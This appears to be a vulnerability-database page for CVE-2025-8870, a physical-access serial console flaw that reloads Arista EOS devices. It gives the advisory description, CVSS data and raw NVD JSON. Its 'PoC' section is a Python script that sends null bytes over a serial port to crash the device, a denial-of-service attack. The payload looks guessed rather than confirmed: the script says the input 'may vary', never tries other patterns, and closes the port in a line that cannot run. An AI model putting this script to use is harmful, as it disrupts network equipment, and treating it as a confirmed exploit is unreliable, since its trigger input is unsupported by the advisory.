Security Vulnerability Report
中文
CVE-2025-8870 CVSS 4.9 MEDIUM

CVE-2025-8870

Published: 2025-11-14 16:15:59
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

On affected platforms running Arista EOS, certain serial console input might result in an unexpected reload of the device.153

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Arista EOS(具体受影响版本需参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8870 PoC - Arista EOS Serial Console DoS # This PoC demonstrates how specific serial console input can trigger device reload # NOTE: This requires physical access to the device's serial console port import serial import time import sys def exploit_cve_2025_8870(serial_port='/dev/ttyUSB0', baud_rate=9600): """ Exploit for CVE-2025-8870: Arista EOS Serial Console Input DoS Prerequisites: - Physical access to device serial console port - Serial cable (USB-to-Serial or standard serial cable) - Serial terminal software or python serial library Usage: python cve_2025_8870_poc.py /dev/ttyUSB0 9600 """ print(f"[*] Connecting to serial console at {serial_port} ({baud_rate} baud)") try: ser = serial.Serial( port=serial_port, baudrate=baud_rate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=5 ) except serial.SerialException as e: print(f"[-] Failed to open serial port: {e}") return False print("[+] Connected to serial console") print("[*] Waiting for device prompt...") time.sleep(3) # Read initial output response = ser.read(ser.in_waiting).decode('utf-8', errors='ignore') print(f"[>] Device response: {response[:200]}...") # Malicious input that triggers the vulnerability # The specific input pattern may vary depending on EOS version malicious_input = "\x00" * 100 + "\n" # Null bytes followed by newline print("[*] Sending malicious input to trigger CVE-2025-8870...") ser.write(malicious_input.encode('utf-8')) ser.flush() print("[*] Waiting for device response...") time.sleep(5) # Check if device is still responding response = ser.read(ser.in_waiting).decode('utf-8', errors='ignore') if "reload" in response.lower() or "restart" in response.lower(): print("[!] Device appears to be reloading - vulnerability confirmed") return True else: print("[*] Device still operational - trying alternative input patterns") return False ser.close() if __name__ == "__main__": port = sys.argv[1] if len(sys.argv) > 1 else '/dev/ttyUSB0' baud = int(sys.argv[2]) if len(sys.argv) > 2 else 9600 exploit_cve_2025_8870(port, baud)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8870", "sourceIdentifier": "[email protected]", "published": "2025-11-14T16:15:59.373", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "On affected platforms running Arista EOS, certain serial console input might result in an unexpected reload of the device.153"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-248"}]}], "references": [{"url": "https://www.arista.com/en/support/advisories-notices/security-advisory/22811-security-advisory-0125", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.